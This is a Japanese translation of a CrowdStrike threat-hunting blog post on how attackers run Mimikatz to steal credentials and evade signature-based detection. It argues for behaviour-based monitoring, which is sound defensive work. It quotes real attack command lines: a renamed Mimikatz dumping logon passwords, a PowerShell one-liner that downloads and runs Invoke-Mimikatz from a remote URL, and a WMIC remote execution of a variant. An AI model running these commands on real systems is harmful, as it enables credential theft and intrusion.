CrowdStrike Blog:「サイバー界のAK47」、Mimikatzを利用したシグネチャベースの検知回避
今回は、オープンソースツールのMimikatzが攻撃者にどのように利用されているかについて、CrowdStrike Falcon OverWatchチームが確認した例をいくつかご紹介します。
国際
海外情報
OverWatchチームは、お客様のインフラストラクチャに対して試みられた攻撃を総合的に可視化しています。この可視化は多岐にわたるお客様の業種・規模を網羅しています。OverWatchチームは、Falconエンドポイントセキュリティプラットフォームが提供するシステムの可視化を用いて、悪意のあるアクティビティを広範囲に観測しています。
権限昇格に使用する認証情報へのアクセス
悪意のあるアクティビティでよく見られるのが、認証情報へのアクセスです。多くの場合、攻撃者は権限を昇格してインフラストラクチャ内のアクセス可能な領域を広げるために、さまざまな手段を使って有効な認証情報を探します。OverWatchチームは、攻撃者が標的とした1人のユーザーに対して、認証情報を盗み取るために複数の手法を用いていたケースを確認しています(認証情報の窃取を狙った悪意のあるアクティビティで複数の手法が使用された例は、「2018年版 Falcon OverWatch Report」で紹介しています)。
Mimikatzの手法
認証情報にアクセスする一般的な方法に、Mimikatzの使用が挙げられます。CrowdStrikeの共同創業者で最高技術責任者(CTO)のDmitri Alperovitchは、Mimikatzを「サイバー界のAK47」と呼んでいます。OverWatchチームは、標的型攻撃とペネトレーションテスト(侵入テスト)のいずれにおいてもMimikatzが使われていることを頻繁に観測しています。
実行ファイル名の変更
Mimikatzを使用した最も単純で直接的な手法は、侵害したシステムにMimikatzをコピーし、実行ファイルの名前を変更し、以下のようなコマンドラインを使用して起動することです。
c:\ProgramData\p.exe ""privilege::debug""
""sekurlsa::logonpasswords""
これにより攻撃者は、システム上の認証情報にアクセスできるようになります。
バッチファイルの使用
Mimikatzを起動する別の方法でこれまでに確認されているものには、バッチファイルを使用して標的となるシステムにMimikatzをコピーし、それを起動してアウトプットをファイルに送信し、その出力ファイルを元の一元的な収集ポイントにコピーして、最後に標的となったシステムから関連ファイルをすべて削除する方法などがあります。
PowerShellの亜種を使用
OverWatchのアナリストがこれまでに確認した認証情報にアクセスするためのその他の方法には、次のような、Mimikatz用に改変したPowerShellを使用した例があります。
powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswordsexit'
コマンドラインオプションの変更
2018年第4四半期には、Mimikatzを使用した別の方法をOverWatchのアナリストが確認しています。具体的には、コマンドラインオプションを変更するように改変されたケースです。
mnl.exe pr::dg sl::lp et -p
このMimikatzの特定の亜種は、以下に示すように、標的とした複数のシステムに対してWMIC.exeを使用して実行されます。
Wmic /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >>
c:\windows\temp\temp.txt"
IOAの監視が必須
これらの手法は明らかに実行ファイルのコマンドラインオプションを参照してその目的を推測したり、バイナリファイル内に関連する文字列が存在するかどうかを確認することだけに頼る脆弱な検知アプローチを回避することを狙ったものと言えます。攻撃者はさまざまな手法を使って認証情報にアクセスする可能性がありますが、Falconプラットフォームは、検知メカニズムを回避または妨害する目的で新しい手法が使用されている場合にも確認できる可視水準を提供します。
ファイル名、ハッシュ、単一のコマンドラインオプションなどの典型的な攻撃の痕跡(IOC)に注目するだけでなく、攻撃者の行動にフォーカスした攻撃の痕跡(IOA)を監視することの重要性が、さらに明らかになっています。
その他のリソース
・「2019 CrowdStrike Global Threat Report:Adversary Tradecraft and the Importance of Speed」をダウンロードしてご覧ください
・「2018年版 CrowdStrike Falcon OverWatch Report 脅威ハンティングの最前線」をダウンロードしてご覧ください
・CrowdStrikeの次世代アンチウイルス(AV)を実際にお試しいただけます。今すぐFalcon Preventの無料トライアル版をお試しください
*原文はCrowdStrike Blog サイト掲載 :https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/
ソース・関連リンク
関連記事
Scan PREMIUM 会員限定記事
もっと見る-
国際
Bugtraq の死と復活、歴史あるコミュニティにアクセンチュアがとった処遇
先週の終わりを画したのは、敬愛すべき情報セキュリティメーリングリストの Bugtraq が月末に閉鎖されるというニュースだった。
-
Salesforce が共和党へのサービス提供を停止した仔細
民主主義統治への擾乱を助長する組織に対して距離を置くことを決めた IT 企業の列に、Amazon、Twitter、Facebook に続いてクラウド CRM(顧客管理システム)最大手の Salesforce が新たに加わった。
-
Sysinternals Suite PsExec において名前付きパイプのハイジャックによりSYSTEM 権限が奪取可能となる手法(Scan Tech Report)
Microsoft OS の遠隔管理ツールである Sysinternals Suite の PsExec に、SYSTEM 権限の奪取が可能となる手法が公開されています。
-
とんだ新年挨拶、証明書期限切れでCheck Point VPNの一部ユーザーが混乱
Check Point社の一部顧客が頭の痛い正月を迎えたのは、二日酔いのせいだけではなかったようだ。パッチの適用が遅れたために、中にはシステムが操作不能のままとなったり修正が困難な状況が続いているケースもある。
カテゴリ別新着記事
脆弱性と脅威 記事一覧へ

Oracle製品のクリティカルパッチアップデートに関する注意喚起

GROWIにXSSの脆弱性、最新版へのアップデートを呼びかけ

無料メール配信システム acmailer にアクセス制限不備、権限昇格の脆弱性

ウイルスバスタービジネスセキュリティシリーズ他に複数の脆弱性

Apache Tomcat における Java API の実装不備に起因する情報漏えいの脆弱性

マイクロソフトが1月のセキュリティ情報を公開、一部脆弱性については悪用の事実を確認済み
インシデント・事故 記事一覧へ

仮想通貨取引所「Liquid」への不正アクセス最終報、APIキー等169,782件の流出を確認

ファイル誤添付、Excel 別シートに新型コロナ接触者情報記載

「IVYCS FEE PAYMENT」へ不正アクセスでカード情報流出の可能性、東京女子大購買センターや青学購買サイトも被害に

イエラエセキュリティ CSIRT支援室 第4回「ツール 運用 組織体制 コスト - 経営バランスの中で実現するセキュリティの難しさ」

ワンオペで編集も承認も、奈良県Webサイト コロナ感染者情報誤掲載

「東京女子大学購買センター Web Shop」に不正アクセス、カード情報含む個人情報流出の可能性
調査・レポート・白書 記事一覧へ

VPN製品に関する脆弱性対策情報の深刻度別割合、「危険」「警告」で95%を占める

売上規模別に見た 全 IT 投資中のセキュリティ予算比率 ~ 東証上場企業

トレンドマイクロが考えるインシデント対応の基本、NISTとSANSのフレームワークをもとに

2021年の 5 つのセキュリティ脅威、CrowdStrike 予測

2020年度版「CrowdStrike グローバルセキュリティ意識調査」発表、ランサムウェアが世界的懸念に

CrowdStrike Adversary Calender 2021 年 1 月( Velvet Chollima )
研修・セミナー・カンファレンス 記事一覧へ

我が社の IoT 活用の課題 総洗い出し ~ JSSEC IoT セキュリティチェックシート活用方法

SPFにまだできること ~ オランダ徴税税関管理局が採用するフィッシングメール対策

CrowdStrike ハンティングチームリーダーが教える、ハンターに必要な資質 ~ 1月末迄オンライン配信

NRIセキュア創立20周年記念し100名無料招待、SANS謹製ハッキングトーナメント開催

セキュリティインシデントの当事者になったその後
